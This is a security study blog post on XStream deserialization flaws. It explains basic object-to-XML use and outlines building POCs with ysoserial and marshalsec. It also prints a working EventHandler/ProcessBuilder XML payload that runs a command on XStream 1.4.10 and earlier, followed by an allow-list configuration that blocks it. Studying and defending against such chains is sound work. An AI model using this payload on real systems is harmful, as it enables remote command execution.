
Learning XStream-related vulnerabilities

Published: 2023-12-17 07:25:21

References:

https://www.bbsmax.com/A/kmzLWkWBdG/ (basic usage)

https://blog.csdn.net/wenrennaoda/article/details/105564606 (how the vulnerability is triggered in each version)

https://zhuanlan.zhihu.com/p/375239304

Basic usage

XStream's main job is converting Java objects to XML and back. The direction that matters for security is XML to object (fromXML): by default XStream instantiates whatever class the element names resolve to, which is what every payload below relies on.

Add the dependency (1.4.10 is chosen on purpose: it is one of the versions the EventHandler payload at the end of this post works against)

    <dependencies>
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.10</version>
        </dependency>
    </dependencies>

Create the Student class

    import java.io.Serializable;

    public class Student implements Serializable {

        private int id;
        private String name;
        private String school;

        // No-arg constructor (XStream's reflection provider does not require it, but keep it for ordinary use)
        public Student() {
        }

        public Student(int id, String name, String school) {
            super();
            this.id = id;
            this.name = name;
            this.school = school;
        }

        public int getId() {
            return id;
        }

        public void setId(int id) {
            this.id = id;
        }

        public String getName() {
            return name;
        }

        public void setName(String name) {
            this.name = name;
        }

        public String getSchool() {
            return school;
        }

        public void setSchool(String school) {
            this.school = school;
        }

        @Override
        public String toString() {
            return "Student [id=" + id + ", name=" + name + ", school=" + school + "]";
        }
    }

Test class SerializeXml: converting an array of objects to XML and back

    package com.ser.test;

    import com.thoughtworks.xstream.XStream;

    import java.io.FileInputStream;
    import java.io.FileOutputStream;
    import java.io.IOException;

    public class SerializeXml {

        public static void main(String[] args) {
            serializeToXml();
            System.out.println("**************************************");
            deserialize();
        }

        public static void serializeToXml() {
            Student stu1 = new Student(10003, "claire", "hh");
            Student stu2 = new Student(10004, "leafly", "niubi");
            Student[] students = { stu1, stu2 };
            XStream xstream = new XStream();
            // Open a stream on the file and serialise the Student array to XML through it
            // (try-with-resources closes the stream; the original never closed it)
            try (FileOutputStream write = new FileOutputStream("myObjtoXml.txt")) {
                xstream.toXML(students, write);
            } catch (IOException e) {
                e.printStackTrace();
            }
            // Print the serialised result
            System.out.println(xstream.toXML(students));
        }

        public static void deserialize() {
            XStream xstream = new XStream();
            Student[] students = null;
            // Unmarshal the XML file back into Student objects
            try (FileInputStream reader = new FileInputStream("myObjtoXml.txt")) {
                students = (Student[]) xstream.fromXML(reader);
            } catch (IOException e) {
                e.printStackTrace();
            }
            if (students != null) {
                for (Student student : students) {
                    System.out.println(student);
                }
            }
        }
    }

The XML file generated after running it:

    <com.ser.test.Student-array>
      <com.ser.test.Student>
        <id>10003</id>
        <name>claire</name>
        <school>hh</school>
      </com.ser.test.Student>
      <com.ser.test.Student>
        <id>10004</id>
        <name>leafly</name>
        <school>niubi</school>
      </com.ser.test.Student>
    </com.ser.test.Student-array>

Test class SerializeXml: converting a single object to XML and back

    package com.ser.test;

    import com.thoughtworks.xstream.XStream;

    import java.io.FileInputStream;
    import java.io.FileOutputStream;
    import java.io.IOException;

    public class SerializeXml {

        public static void main(String[] args) {
            serializeToXml();
            System.out.println("**************************************");
            deserialize();
        }

        public static void serializeToXml() {
            Student stu1 = new Student(10003, "claire", "hh");
            XStream xstream = new XStream();
            // Open a stream on the file and serialise the Student object to XML through it
            try (FileOutputStream write = new FileOutputStream("myObjtoXml.txt")) {
                xstream.toXML(stu1, write);
            } catch (IOException e) {
                e.printStackTrace();
            }
            // Print the serialised result
            System.out.println(xstream.toXML(stu1));
        }

        public static void deserialize() {
            XStream xstream = new XStream();
            // Unmarshal the XML file back into a Student object
            try (FileInputStream reader = new FileInputStream("myObjtoXml.txt")) {
                Student stu1 = (Student) xstream.fromXML(reader);
                System.out.println(stu1);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }

The generated XML:

    <com.ser.test.Student>
      <id>10003</id>
      <name>claire</name>
      <school>hh</school>
    </com.ser.test.Student>

Probing with URLDNS (DNS log)

Generating the POC

Import the marshalsec project into IDEA and add ysoserial as a dependency.

Find the gadget you want to modify; here CommonsBeanutils is used as the example.

Comment out the original logic that builds the object and replace it with a call into ysoserial's payload logic.

Save the output. In the test code above, comment out serializeToXml and call deserialize directly so the generated file is passed straight to fromXML, then check whether the DNS log receives the lookup.

 

Generating an exploit that executes a command directly via CommonsBeanutils1

Same approach as above. Because no remote loading over LDAP is needed here, re-implement the payload generation by following ysoserial's exploit-building logic for the target gadget (CommonsBeanutils1) so that it executes a command such as whoami. If an in-memory webshell needs to be injected instead, swap out the corresponding ysoserial module.

Other exploits

Based on EventHandler; works on 1.4.10, 1.4.6 and 1.4.5. This is the dynamic-proxy/EventHandler chain (CVE-2013-7285); XStream 1.4.7 introduced the security framework and denied EventHandler by default, but 1.4.10 shipped with the framework not initialised unless the application called setupDefaultSecurity, so the chain works again there (CVE-2019-10173, fixed in 1.4.11). Trigger: <sorted-set> is unmarshalled as a TreeSet and each child is added to it; adding the dynamic proxy makes the TreeSet call compareTo on it, EventHandler forwards that call as start() to its ProcessBuilder target, and the command runs (here it opens Calculator on macOS).

    <sorted-set>
      <string>foo</string>
      <dynamic-proxy>
        <interface>java.lang.Comparable</interface>
        <handler class="java.beans.EventHandler">
          <target class="java.lang.ProcessBuilder">
            <command>
              <string>open</string>
              <string>/System/Applications/Calculator.app</string>
            </command>
          </target>
          <action>start</action>
        </handler>
      </dynamic-proxy>
    </sorted-set>
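The following is an added example, not code from the original post. It puts the deserialization harness described in the POC steps (read a file and hand it straight to fromXML) beside an allow-list configuration built on XStream's security framework (available since 1.4.7) that only admits the Student documents from the basic-usage section. Against the EventHandler payload above saved as a file, the unrestricted instance on 1.4.10 runs the command during fromXML, while the restricted instance rejects the document at the first element it cannot resolve (java.util.TreeSet for <sorted-set>) with ForbiddenClassException, before any constructor runs. The class name PayloadLoader, the file name and the exact allow-list are assumptions.

```java
package com.ser.test;

import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ArrayTypePermission;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;

// Added example (assumed class name): loads an XML document with XStream in the
// two configurations discussed in this post and reports what happens.
public class PayloadLoader {

    // The configuration used by the SerializeXml examples. On 1.4.10 the security
    // framework is not initialised, so any class XStream can resolve from the
    // element names (java.util.TreeSet, the dynamic proxy, java.beans.EventHandler,
    // java.lang.ProcessBuilder) is instantiated straight from the XML.
    static XStream unrestricted() {
        return new XStream();
    }

    // Allow-list configuration: deny every type first, then re-enable only what
    // the Student documents need. Anything else raises ForbiddenClassException
    // while the element name is being resolved, before a converter runs.
    static XStream restricted() {
        XStream xstream = new XStream();
        xstream.addPermission(NoTypePermission.NONE);              // deny by default
        xstream.addPermission(NullPermission.NULL);                // <null/>
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES); // int, Integer, ...
        xstream.addPermission(ArrayTypePermission.ARRAYS);         // <...Student-array>
        xstream.allowTypes(new Class[] { String.class, Student.class });
        return xstream;
    }

    // Pass the stream straight to fromXML, as deserialize() does above, and turn a
    // rejected document into a logged null instead of an escaping exception.
    static Object load(XStream xstream, InputStream in) {
        try {
            return xstream.fromXML(in);
        } catch (ForbiddenClassException e) {
            System.err.println("rejected by allow-list: " + e.getMessage());
            return null;
        }
    }

    // Usage: java com.ser.test.PayloadLoader payload.xml [unsafe]
    // Without "unsafe" the allow-listed instance is used and the EventHandler
    // payload is rejected; with it, the default instance is used and the
    // payload's command runs inside fromXML.
    public static void main(String[] args) throws IOException {
        String path = args.length > 0 ? args[0] : "myObjtoXml.txt";
        boolean unsafe = args.length > 1 && "unsafe".equals(args[1]);
        try (InputStream in = new FileInputStream(path)) {
            Object result = load(unsafe ? unrestricted() : restricted(), in);
            System.out.println(result);
        }
    }
}
```

The allow-list is deliberately narrower than XStream.setupDefaultSecurity, which also admits collections, maps and interface types; with those enabled the TreeSet and the dynamic proxy would be created and the chain would only be stopped at java.beans.EventHandler itself, so an allow-list scoped to the application's own types is the safer default for untrusted input.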